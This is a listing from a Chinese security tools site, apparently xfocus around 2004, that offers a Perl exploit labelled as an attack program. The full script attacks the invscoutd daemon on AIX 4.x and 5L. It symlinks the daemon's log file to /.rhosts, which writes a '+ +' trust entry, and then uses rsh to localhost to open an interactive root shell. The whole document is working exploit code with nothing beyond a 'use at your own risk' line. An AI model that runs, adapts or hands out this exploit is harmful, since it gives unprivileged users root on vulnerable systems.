x_invscoutd_aix5l_4x.pl提交时间:2004-03-24 提交用户:watercloud 工具分类:攻击程序 运行平台:Unix 工具大小:1035 Bytes 文件MD5 :684a30bff440f398eda31f03d373c1d2 工具来源:www.xfocus.net #!/usr/bin/perl # FileName: x_invscoutd.pl # Exploit invscoutd of Aix4.x & 5L to get a uid=0 shell. # Tested : on Aix4.3.3 & Aix5.1. # Some high version of invscoutd is not affected. # Author : watercloud@xfocus.org # Site : www.xfocus.org www.xfocus.net # Date : 2003-5-29 # Announce: use as your owner risk! $LOG="/tmp/.ex/.hello\n+ +\nworld"; $CMD="/usr/sbin/invscoutd"; umask 022; mkdir "/tmp/.ex",0777; print "Exploit error on kill process invscoutd !!" ,exit 1 if &killproc() == 0; symlink "/.rhosts",$LOG; system $CMD,"-p7321",$LOG; &killproc(); unlink $LOG; print "\n============\nRemember to remove /.rhosts !!\n"; print "rsh localhost -l root '/bin/sh -i'\n"; print "waiting . . . . . .\n"; system "rsh","localhost","-l","root","/bin/sh -i"; system $CMD,"-p808","/dev/null" ; &killproc(); rmdir "/tmp/.ex"; sub killproc() { $_=`ps -ef |grep invscoutd |grep -v grep |grep -v perl`; @proc_lst=split; $ret=kill 9,$proc_lst[1] if $proc_lst[1]; $ret=-1 if ! defined $ret; return $ret; } #EOF >> 下载 << |
